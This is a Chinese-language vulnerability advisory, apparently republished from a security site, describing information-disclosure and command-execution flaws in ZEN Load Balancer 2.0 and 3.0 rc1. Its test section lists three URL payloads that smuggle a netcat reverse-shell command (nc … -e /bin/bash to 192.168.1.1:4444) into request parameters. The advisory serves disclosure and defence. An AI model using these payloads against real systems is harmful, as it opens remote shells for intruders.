ZEN Load Balancer多个安全漏洞

发布日期:2012-09-21
更新日期:2012-09-25

受影响系统:
ZEN Load Balancer ZEN Load Balancer 3.0 rc1
ZEN Load Balancer ZEN Load Balancer 2.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55638

Zen Load Balancer是一个基于Debian来创建一个TCP负载平衡的设备。

ZEN Load Balancer 2.0和3.0 rc1存在安全漏洞,攻击者可利用这些漏洞执行任意命令,上传任意文件到受影响计算机或泄漏敏感信息。

1)应用没有正确限制访问config/global.conf文件,可被利用泄露某些系统信息。

2)应用没有正确限制访问备份目录,可被利用列出和下载任意备份并泄露系统信息。

<*来源:Brendan Coles
 
  链接:
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

?id=2-2&amp;amp;filelog=%26nc+192.168.1.1+4444+-e

+/bin/bash;&amp;amp;nlines=1&amp;amp;action=See+logs
?id=2-2&amp;amp;filelog=#&amp;amp;nlines=1%26nc+192.168.1.1+4444+-e

+/bin/bash;&amp;amp;action=See+logs
?id=3-2&amp;amp;if=lo%26nc+192.168.1.1+4444+-e+/bin/bash

%26&amp;amp;status=up&amp;amp;newip=0.0.0.0&amp;amp;netmask=255.255.255.0&amp;amp;gwaddr=&amp;amp;action=Save+

%26+Up!

建议:
--------------------------------------------------------------------------------
厂商补丁:

ZEN Load Balancer
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyxfwp.html